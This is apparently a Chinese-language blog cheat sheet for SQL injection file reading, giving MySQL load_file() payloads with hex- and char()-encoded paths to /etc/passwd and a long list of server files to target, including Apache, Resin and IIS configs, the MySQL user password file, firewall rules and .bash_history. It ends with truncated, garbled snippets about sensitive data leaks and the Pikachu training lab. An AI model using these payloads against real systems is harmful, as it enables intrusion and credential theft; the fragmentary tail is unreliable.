1、 replace(load_file(0×2f6574632f706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面兩個是檢視乙個php檔案裡完全顯示**.有些時候不替換一些字元,如 「<」 替換成」空格」 返回的是網頁.而無法檢視到**.
3、 load_file(char(47)) 可以列出freebsd,sunos系統根目錄
4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 檢視linux apache虛擬主機配置檔案
5、c:\program files\apache group\apache\conf\httpd.conf 或c:\apache\conf\httpd.conf 檢視windows系統apache檔案
6、c:/resin-3.0.14/conf/resin.conf 檢視jsp開發的** resin檔案配置資訊.
7、c:/resin/conf/resin.conf /usr/local/resin/conf/resin.conf 檢視linux系統配置的jsp虛擬主機
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路徑
11、 c:\windows\system32\inetsrv\metabase.xml 檢視iis的虛擬主機配置檔案
12、 /usr/local/resin-3.0.22/conf/resin.conf 針對3.0.22的resin配置檔案檢視
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
15、 /etc/sysconfig/iptables 本看防火牆策略
17 、/etc/my.cnf mysql的配置檔案
18、 /etc/redhat-release 紅帽子的系統版本
19 、c:\mysql\data\mysql\user.myd 存在mysql系統中的使用者密碼
20、/etc/sysconfig/network-scripts/ifcfg-eth0 檢視ip.
23、c:\program files\rhinosoft.com\serv-u\servudaemon.ini
24、c:\windows\my.ini
25、/etc/issue 顯示linux核心的發行版本資訊
26、/etc/ftpuser
27、檢視linux使用者下的操作記錄檔案.bash_history 或 .bash_profile
敏感資訊洩漏
漏洞成因 filename get filename echo echo file get contents filename header content type imgage jpeg header content disposition attachment filename filenam...
敏感資訊洩露
1 儲存 2 傳輸過程 http https 加密演算法如下 運維層面 日誌 備份檔案 配置檔案 應用層面 使用者資訊 通訊錄 郵箱 然後,攻擊者利用這個cookie 執行重放攻井接管使用者的會話從而訪問使用者的隱私資料。對於敏感資料,應當確保 1 當這些資料被長期儲存的時候,無論儲存在 它們是否都...
Pikachu 敏感資訊洩露
由於後台人員的疏忽或者不當的設計,導致不應該被前端使用者看到的資料被輕易的訪問到。比如 通過訪問url下的目錄,可以直接列出目錄下的檔案列表 輸入錯誤的url引數後報錯資訊裡面包含作業系統 中介軟體 開發語言的版本或其他資訊 前端的原始碼 html,css,js 裡面包含了敏感資訊,比如後台登入位址...